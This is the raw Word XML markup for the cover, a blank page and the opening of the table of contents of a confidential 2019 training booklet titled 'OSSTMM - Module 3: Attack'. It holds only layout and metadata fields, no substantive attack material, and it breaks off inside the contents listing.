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F6E0F" w14:textId="7965A81D" w:rsidR="00474825" w:rsidRDefault="00D2614A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2071625F" wp14:editId="4DDDD7C3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>257810</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>5813279</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3227705" cy="1176655"/>
                <wp:effectExtent l="0" t="0" r="10795" b="4445"/>
                <wp:wrapNone/>
                <wp:docPr id="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176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273D3" w14:textId="0AA9CA3C" w:rsidR="00B70BCA" w:rsidRDefault="00B70BCA" w:rsidP="002F7918">
                            <w:pPr>
                              <w:pStyle w:val="Text"/>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00410A3C">
                              <w:t xml:space="preserve">Created on: </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00410A3C">
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r w:rsidRPr="00410A3C">
                              <w:instrText xml:space="preserve"> DATE \@ "dd MMMM yyyy" </w:instrText>
                            </w:r>
                            <w:r w:rsidRPr="00410A3C">
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r w:rsidR="00C61995">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>03 December 2019</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00410A3C">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3CE229FD" w14:textId="52E4E142" w:rsidR="00B70BCA" w:rsidRPr="00410A3C" w:rsidRDefault="00B70BCA" w:rsidP="002F7918">
                            <w:pPr>
                              <w:pStyle w:val="Text"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Version: 0.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4B719B90" w14:textId="42C7303C" w:rsidR="00B70BCA" w:rsidRPr="00410A3C" w:rsidRDefault="00B70BCA" w:rsidP="002F7918">
                            <w:pPr>
                              <w:pStyle w:val="Text"/>
                            </w:pPr>
                            <w:r w:rsidRPr="00410A3C">
                              <w:t xml:space="preserve">Sensitivity: </w:t>
                            </w:r>
                            <w:r w:rsidR="00271136">
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r w:rsidR="00271136">
                              <w:instrText xml:space="preserve"> DOCPROPERTY  Sensitivity  \* MERGEFORMAT </w:instrText>
                            </w:r>
                            <w:r w:rsidR="00271136">
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r>
                              <w:t>Confidential</w:t>
                            </w:r>
                            <w:r w:rsidR="00271136">
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6069B62E" w14:textId="1C688630" w:rsidR="00B70BCA" w:rsidRPr="00410A3C" w:rsidRDefault="00B70BCA" w:rsidP="002F7918">
                            <w:pPr>
                              <w:pStyle w:val="Text"/>
                            </w:pPr>
                            <w:r w:rsidRPr="00410A3C">
                              <w:t xml:space="preserve">Our Reference: </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:instrText xml:space="preserve"> FILENAME   \* MERGEFORMAT </w:instrText>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>OSSTMM_Booklet_Module_3.docx</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="527EFEDE" w14:textId="4579DE1B" w:rsidR="00B70BCA" w:rsidRPr="00410A3C" w:rsidRDefault="00B70BCA" w:rsidP="002F7918">
                            <w:pPr>
                              <w:pStyle w:val="Text"/>
                            </w:pPr>
                            <w:r w:rsidRPr="00410A3C">
                              <w:t xml:space="preserve">Contact: </w:t>
                            </w:r>
                            <w:r>
                              <w:t>Damien GITTER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71625F" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 20" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:20.3pt;margin-top:457.75pt;width:254.15pt;height:9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T2asAIAAKs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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="16C273D3" w14:textId="0AA9CA3C" w:rsidR="00B70BCA" w:rsidRDefault="00B70BCA" w:rsidP="002F7918">
                      <w:pPr>
                        <w:pStyle w:val="Text"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00410A3C">
                        <w:t xml:space="preserve">Created on: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00410A3C">
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r w:rsidRPr="00410A3C">
                        <w:instrText xml:space="preserve"> DATE \@ "dd MMMM yyyy" </w:instrText>
                      </w:r>
                      <w:r w:rsidRPr="00410A3C">
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="00C61995">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>03 December 2019</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00410A3C">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3CE229FD" w14:textId="52E4E142" w:rsidR="00B70BCA" w:rsidRPr="00410A3C" w:rsidRDefault="00B70BCA" w:rsidP="002F7918">
                      <w:pPr>
                        <w:pStyle w:val="Text"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Version: 0.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4B719B90" w14:textId="42C7303C" w:rsidR="00B70BCA" w:rsidRPr="00410A3C" w:rsidRDefault="00B70BCA" w:rsidP="002F7918">
                      <w:pPr>
                        <w:pStyle w:val="Text"/>
                      </w:pPr>
                      <w:r w:rsidRPr="00410A3C">
                        <w:t xml:space="preserve">Sensitivity: </w:t>
                      </w:r>
                      <w:r w:rsidR="00271136">
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r w:rsidR="00271136">
                        <w:instrText xml:space="preserve"> DOCPROPERTY  Sensitivity  \* MERGEFORMAT </w:instrText>
                      </w:r>
                      <w:r w:rsidR="00271136">
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r>
                        <w:t>Confidential</w:t>
                      </w:r>
                      <w:r w:rsidR="00271136">
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6069B62E" w14:textId="1C688630" w:rsidR="00B70BCA" w:rsidRPr="00410A3C" w:rsidRDefault="00B70BCA" w:rsidP="002F7918">
                      <w:pPr>
                        <w:pStyle w:val="Text"/>
                      </w:pPr>
                      <w:r w:rsidRPr="00410A3C">
                        <w:t xml:space="preserve">Our Reference: </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:instrText xml:space="preserve"> FILENAME   \* MERGEFORMAT </w:instrText>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>OSSTMM_Booklet_Module_3.docx</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="527EFEDE" w14:textId="4579DE1B" w:rsidR="00B70BCA" w:rsidRPr="00410A3C" w:rsidRDefault="00B70BCA" w:rsidP="002F7918">
                      <w:pPr>
                        <w:pStyle w:val="Text"/>
                      </w:pPr>
                      <w:r w:rsidRPr="00410A3C">
                        <w:t xml:space="preserve">Contact: </w:t>
                      </w:r>
                      <w:r>
                        <w:t>Damien GITTER</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00DF3C6D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="40AA3703" wp14:editId="4A065648">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1935678</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>4667002</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3135193" cy="1318161"/>
                <wp:effectExtent l="0" t="0" r="8255" b="15875"/>
                <wp:wrapTight wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21548"/>
                    <wp:lineTo x="21526" y="21548"/>
                    <wp:lineTo x="21526" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapTight>
                <wp:docPr id="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5193" cy="1318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42F4B" w14:textId="01A6F813" w:rsidR="00B70BCA" w:rsidRDefault="00B70BCA" w:rsidP="009344D5">
                            <w:pPr>
                              <w:pStyle w:val="AddressBold"/>
                              <w:spacing w:line="480" w:lineRule="exact"/>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:color w:val="FFFFFF"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="52"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="009344D5">
                              <w:rPr>
                                <w:sz w:val="12"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r w:rsidRPr="009344D5">
                              <w:rPr>
                                <w:sz w:val="12"/>
                              </w:rPr>
                              <w:instrText xml:space="preserve"> DOCPROPERTY  Customer  \* MERGEFORMAT </w:instrText>
                            </w:r>
                            <w:r w:rsidRPr="009344D5">
                              <w:rPr>
                                <w:sz w:val="12"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r w:rsidRPr="002E5525">
                              <w:rPr>
                                <w:sz w:val="12"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r w:rsidRPr="002E5525">
                              <w:rPr>
                                <w:sz w:val="12"/>
                              </w:rPr>
                              <w:instrText xml:space="preserve"> DOCPROPERTY  Title  \* MERGEFORMAT </w:instrText>
                            </w:r>
                            <w:r w:rsidRPr="002E5525">
                              <w:rPr>
                                <w:sz w:val="12"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r w:rsidRPr="00B80C42">
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:color w:val="FFFFFF"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="52"/>
                              </w:rPr>
                              <w:t>OSSTMM - MODULE</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="12"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B80C42">
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:color w:val="FFFFFF"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="52"/>
                              </w:rPr>
                              <w:t>3</w:t>
                            </w:r>
                            <w:r w:rsidRPr="002E5525">
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:color w:val="FFFFFF"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="52"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6B0C2D75" w14:textId="4B8B75FC" w:rsidR="00B70BCA" w:rsidRDefault="00B70BCA" w:rsidP="009344D5">
                            <w:pPr>
                              <w:pStyle w:val="AddressBold"/>
                              <w:spacing w:line="480" w:lineRule="exact"/>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:color w:val="FFFFFF"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="52"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="0108BD7B" w14:textId="52ACEB19" w:rsidR="00B70BCA" w:rsidRDefault="00B70BCA" w:rsidP="00E32CBC">
                            <w:pPr>
                              <w:pStyle w:val="AddressBold"/>
                              <w:spacing w:line="480" w:lineRule="exact"/>
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="30"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="30"/>
                              </w:rPr>
                              <w:t>Attack</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="403A2CC6" w14:textId="77777777" w:rsidR="00B70BCA" w:rsidRPr="002E5525" w:rsidRDefault="00B70BCA" w:rsidP="009344D5">
                            <w:pPr>
                              <w:pStyle w:val="AddressBold"/>
                              <w:spacing w:line="480" w:lineRule="exact"/>
                              <w:rPr>
                                <w:b w:val="0"/>
                                <w:color w:val="FFFFFF"/>
                                <w:sz w:val="44"/>
                                <w:szCs w:val="5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3703" id="Text Box 21" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:152.4pt;margin-top:367.5pt;width:246.85pt;height:103.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" o:allowoverlap="f" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="59B42F4B" w14:textId="01A6F813" w:rsidR="00B70BCA" w:rsidRDefault="00B70BCA" w:rsidP="009344D5">
                      <w:pPr>
                        <w:pStyle w:val="AddressBold"/>
                        <w:spacing w:line="480" w:lineRule="exact"/>
                        <w:rPr>
                          <w:b w:val="0"/>
                          <w:color w:val="FFFFFF"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="52"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="009344D5">
                        <w:rPr>
                          <w:sz w:val="12"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r w:rsidRPr="009344D5">
                        <w:rPr>
                          <w:sz w:val="12"/>
                        </w:rPr>
                        <w:instrText xml:space="preserve"> DOCPROPERTY  Customer  \* MERGEFORMAT </w:instrText>
                      </w:r>
                      <w:r w:rsidRPr="009344D5">
                        <w:rPr>
                          <w:sz w:val="12"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r w:rsidRPr="002E5525">
                        <w:rPr>
                          <w:sz w:val="12"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r w:rsidRPr="002E5525">
                        <w:rPr>
                          <w:sz w:val="12"/>
                        </w:rPr>
                        <w:instrText xml:space="preserve"> DOCPROPERTY  Title  \* MERGEFORMAT </w:instrText>
                      </w:r>
                      <w:r w:rsidRPr="002E5525">
                        <w:rPr>
                          <w:sz w:val="12"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidRPr="00B80C42">
                        <w:rPr>
                          <w:b w:val="0"/>
                          <w:color w:val="FFFFFF"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="52"/>
                        </w:rPr>
                        <w:t>OSSTMM - MODULE</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="12"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B80C42">
                        <w:rPr>
                          <w:b w:val="0"/>
                          <w:color w:val="FFFFFF"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="52"/>
                        </w:rPr>
                        <w:t>3</w:t>
                      </w:r>
                      <w:r w:rsidRPr="002E5525">
                        <w:rPr>
                          <w:b w:val="0"/>
                          <w:color w:val="FFFFFF"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="52"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6B0C2D75" w14:textId="4B8B75FC" w:rsidR="00B70BCA" w:rsidRDefault="00B70BCA" w:rsidP="009344D5">
                      <w:pPr>
                        <w:pStyle w:val="AddressBold"/>
                        <w:spacing w:line="480" w:lineRule="exact"/>
                        <w:rPr>
                          <w:b w:val="0"/>
                          <w:color w:val="FFFFFF"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="52"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="0108BD7B" w14:textId="52ACEB19" w:rsidR="00B70BCA" w:rsidRDefault="00B70BCA" w:rsidP="00E32CBC">
                      <w:pPr>
                        <w:pStyle w:val="AddressBold"/>
                        <w:spacing w:line="480" w:lineRule="exact"/>
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="30"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="30"/>
                        </w:rPr>
                        <w:t>Attack</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="403A2CC6" w14:textId="77777777" w:rsidR="00B70BCA" w:rsidRPr="002E5525" w:rsidRDefault="00B70BCA" w:rsidP="009344D5">
                      <w:pPr>
                        <w:pStyle w:val="AddressBold"/>
                        <w:spacing w:line="480" w:lineRule="exact"/>
                        <w:rPr>
                          <w:b w:val="0"/>
                          <w:color w:val="FFFFFF"/>
                          <w:sz w:val="44"/>
                          <w:szCs w:val="52"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="tight" anchorx="page" anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00474825">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="CURRENT_SELECTION"/>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="794DFAFB" w14:textId="77777777" w:rsidR="0084173B" w:rsidRDefault="0084173B" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="189C4162" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D851CED" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36B37F26" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F21A07C" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68167A0E" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41555017" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00EE5681" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="527945AA" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11726A72" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D6A54A1" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="233D8DB1" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7173AE" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6F8C6A" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="446A8CCF" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46A8B3EC" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="510B2C97" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34BA7E1D" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7184EF88" w14:textId="77777777" w:rsidR="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="0084173B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C41D8D" w14:textId="618E5161" w:rsidR="00E30FD9" w:rsidRPr="00E30FD9" w:rsidRDefault="00E30FD9" w:rsidP="00E30FD9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
          <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E30FD9">
        <w:rPr>
          <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std" w:cs="Segoe UI"/>
          <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This page intentionally left blank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531417AE" w14:textId="60472801" w:rsidR="00D74A17" w:rsidRPr="00D532B9" w:rsidRDefault="0084173B" w:rsidP="00D532B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4270">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="2" w:name="_Toc26269447" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Times New Roman" w:hAnsi="Calibri Light" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:id w:val="-310629033"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="44DD50F7" w14:textId="77777777" w:rsidR="00D74A17" w:rsidRPr="0084173B" w:rsidRDefault="00D74A17" w:rsidP="000B57A2">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="0"/>
            </w:numPr>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:lang w:val="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="0084173B">
            <w:rPr>
              <w:lang w:val="en-GB"/>
            </w:rPr>
            <w:t>Summary</w:t>
          </w:r>
          <w:bookmarkEnd w:id="2"/>
        </w:p>
        <w:p w14:paraId="485AAFB2" w14:textId="59EE3254" w:rsidR="0008357F" w:rsidRDefault="00D74A17">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00BF4270">
            <w:rPr>
              <w:lang w:val="en-GB"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00BF4270">
            <w:rPr>
              <w:lang w:val="en-GB"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-1" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00BF4270">
            <w:rPr>
              <w:lang w:val="en-GB"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc26269447" w:history="1">
            <w:r w:rsidR="0008357F" w:rsidRPr="00A32097">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Summary</w:t>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0008357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc26269447 \h </w:instrText>
            </w:r>
